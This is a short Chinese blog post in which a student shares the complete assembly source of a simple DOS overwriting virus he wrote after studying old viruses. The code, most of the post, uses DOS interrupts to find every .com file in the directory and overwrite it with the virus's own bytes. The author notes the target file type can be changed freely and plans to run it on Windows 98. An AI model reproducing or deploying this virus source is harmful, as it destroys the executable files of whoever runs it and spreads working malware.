作者分享了一个简单的DOS病毒编写教程,该病毒能够感染指定类型的文件并写入特定长度的内容。文章提供了详细的源代码,并介绍了如何使用DOS中断进行文件操作。
下载拉1000多个"史前时期"(82--98年左右)的小病毒 全汇编 (1K---200K) 看拉3个
其实很简单就是几个DOS中断(文件 磁盘操作相关)
自己试着写拉一个:将本目录的*.com(可以随便改想感染的类型)逐个写入指定长度的内容
源代码如下:
data_1e equ 9Eh
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
COPYR proc far
start:
mov ah,4Eh
mov cl,20h
mov dx,offset data_3
int 21h
loc_1:
mov dx,data_1e
mov ax,3D01h
int 21h
mov bx,ax
mov dx,offset ds:[100h]
mov cl,2Eh
mov ah,40h
int 21h
mov ah,3Eh
int 21h
mov ah,4Fh
int 21h
jnc loc_1
int 20h
data_3 db 2Ah ;*.com的ascii码(十六进制)
db 2Eh, 43h, 4Fh, 4Dh, 00h
COPYR endp
seg_a ends
end start
效果图看相册
我用的是诺顿 xp下能被检出 但是不能运行 会抛异常(XP下禁止中断,用驱动突破ring0级限制 我正在研究 还不会 :) )
正在下载98的镜象 用VPC虚上 程序在98上跑 就能运拉 我估计 呵呵
ps:我写博客的目的是督促自己 寒假学习一下 下学期就要去公司实习拉 别什么都忘拉
扫一扫
3285
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
